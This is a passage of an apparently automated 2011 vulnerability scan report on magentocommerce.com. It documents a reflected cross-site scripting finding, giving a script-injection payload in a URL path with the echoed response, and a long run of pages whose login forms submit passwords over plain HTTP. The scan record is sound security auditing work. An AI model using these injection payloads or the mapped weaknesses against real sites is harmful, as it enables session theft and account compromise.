<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Job Post
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/job-post.html?18915"><script>alert(1)</script>8cadda0bb16=1" />
...[SNIP]...
1.54. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/skin/frontend/enterprise/mc/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71721"><script>alert(1)</script>7f09bd527cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/skin71721"><script>alert(1)</script>7f09bd527cd/frontend/enterprise/mc/favicon.ico HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:02:42 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:41 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:41 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:41 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:41 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/skin71721"><script>alert(1)</script>7f09bd527cd/frontend/enterprise/mc/favicon.ico" />
...[SNIP]...
2. Cleartext submission of password  previous  next
There are 150 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

2.1. http://www.magentocommerce.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:40:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: guid=db13949594b1b3d2138f3212e370aacf; expires=Mon, 06-Aug-2012 13:40:32 GMT; path=/
Set-Cookie: exp_domain=magentocommerce.com; expires=Sat, 11-Aug-2012 23:48:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=997810832; expires=Sat, 11-Aug-2012 13:40:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313170832; expires=Sat, 11-Aug-2012 13:40:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:40:32 GMT
Content-Length: 35354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.2. http://www.magentocommerce.com/!!!--  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /!!!--

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /!!!-- HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176591; expires=Sat, 11-Aug-2012 15:16:31 GMT; path=/; domain=magentocommerce.com
Content-Length: 32486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.3. http://www.magentocommerce.com/answers/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /answers/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /answers/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1313176378; expires=Sat, 11-Aug-2012 15:12:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fanswers%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-Garden-Version: Vanilla 2.0.17.9
Last-Modified: Fri, 12 Aug 2011 15:12:58 GMT
Content-Length: 54246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
<head>
   <title>Magento Answer
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
        <form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
           <input type="hidden" name="login[back_url]" value="/answers/">
...[SNIP]...
</label>
           <input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]" /></p>
...[SNIP]...
2.4. http://www.magentocommerce.com/blog  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blog HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176376; expires=Sat, 11-Aug-2012 15:12:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:57 GMT
Content-Length: 92426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.5. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/ebay-agrees-to-acquire-magento/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blog/comments/ebay-agrees-to-acquire-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176433; expires=Sat, 11-Aug-2012 15:13:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:53 GMT
Content-Length: 45747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.6. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-new-open-source-project/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blog/comments/magento-wins-best-new-open-source-project/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176465; expires=Sat, 11-Aug-2012 15:14:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-new-open-source-project%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:26 GMT
Content-Length: 80846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.7. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-of-open-source-enterprise-applications/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blog/comments/magento-wins-best-of-open-source-enterprise-applications/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176441; expires=Sat, 11-Aug-2012 15:14:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A72%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-of-open-source-enterprise-applications%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 58972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.8. http://www.magentocommerce.com/boards/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /boards/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176405; expires=Sat, 11-Aug-2012 15:13:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fboards%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:27 GMT
Content-Length: 293542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.9. http://www.magentocommerce.com/boards/viewforum/10252/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewforum/10252/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /boards/viewforum/10252/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176393; expires=Sat, 11-Aug-2012 15:13:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewforum%2F10252%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:16 GMT
Content-Length: 112502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.10. http://www.magentocommerce.com/boards/viewthread/1647/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewthread/1647/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /boards/viewthread/1647/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176416; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewthread%2F1647%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: exp_forum_topics=a%3A0%3A%7B%7D; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:37 GMT
Content-Length: 116291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.11. http://www.magentocommerce.com/bug-tracking  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /bug-tracking

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bug-tracking HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176426; expires=Sat, 11-Aug-2012 15:13:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fbug-tracking%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:46 GMT
Content-Length: 34213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.12. http://www.magentocommerce.com/casestudies  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /casestudies

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /casestudies HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176318; expires=Sat, 11-Aug-2012 15:11:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fcasestudies%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:58 GMT
Content-Length: 52582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.13. http://www.magentocommerce.com/company/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
